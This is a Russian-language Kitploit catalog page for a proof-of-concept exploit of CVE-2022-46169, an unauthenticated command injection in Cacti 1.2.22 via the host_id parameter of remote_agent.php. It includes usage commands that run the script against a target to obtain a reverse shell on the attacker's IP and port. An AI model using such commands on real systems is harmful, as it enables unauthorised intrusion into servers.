Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-46169 — Эксплойт Proof-of-concept для CVE-2022-46169, позволяющий неаутентифицированное удаленное выполнение кода через внедрение команд в Cacti 1.2.22. | Kitploit
Инструменты/GitHubGitHub/devilgothies/cve-2022-46169
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubdevilgothies/cve-2022-46169

CVE-2022-46169

Эксплойт Proof-of-concept для CVE-2022-46169, позволяющий неаутентифицированное удаленное выполнение кода через внедрение команд в Cacti 1.2.22.

Репозиторий
3 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-46169 POC

Это скрипт доказательства концепции (POC) для уязвимости CVE-2022-46169, затрагивающей Cacti версии 1.2.22.

Описание

Уязвимость CVE-2022-46169 позволяет неавторизованную инъекцию команд в Cacti версиях до 1.2.22 включительно для достижения неавторизованного удаленного выполнения кода от имени пользователя www-data. Уязвимость вызвана некорректной проверкой пользовательского ввода в параметре "host_id" файла "remote_agent.php".

Использование

root@kitploit:~
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>

Замените <TARGET_URL> на URL целевой установки Cacti, <YOUR_IP> на IP-адрес машины, на которую вы хотите получить обратную оболочку, и <YOUR_PORT> на номер порта, на который вы хотите получить обратную оболочку.

Пример:

root@kitploit:~
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337

Отказ от ответственности

Этот скрипт POC предназначен только для образовательных целей. Используйте его на свой страх и риск. Автор этого скрипта не несет ответственности за любой ущерб, причиненный использованием этого скрипта. Ссылки

CVE-2022-46169 - Запись CVE для этой уязвимости.


Уведомления безопасности Cacti на GitHub
Скачать инструмент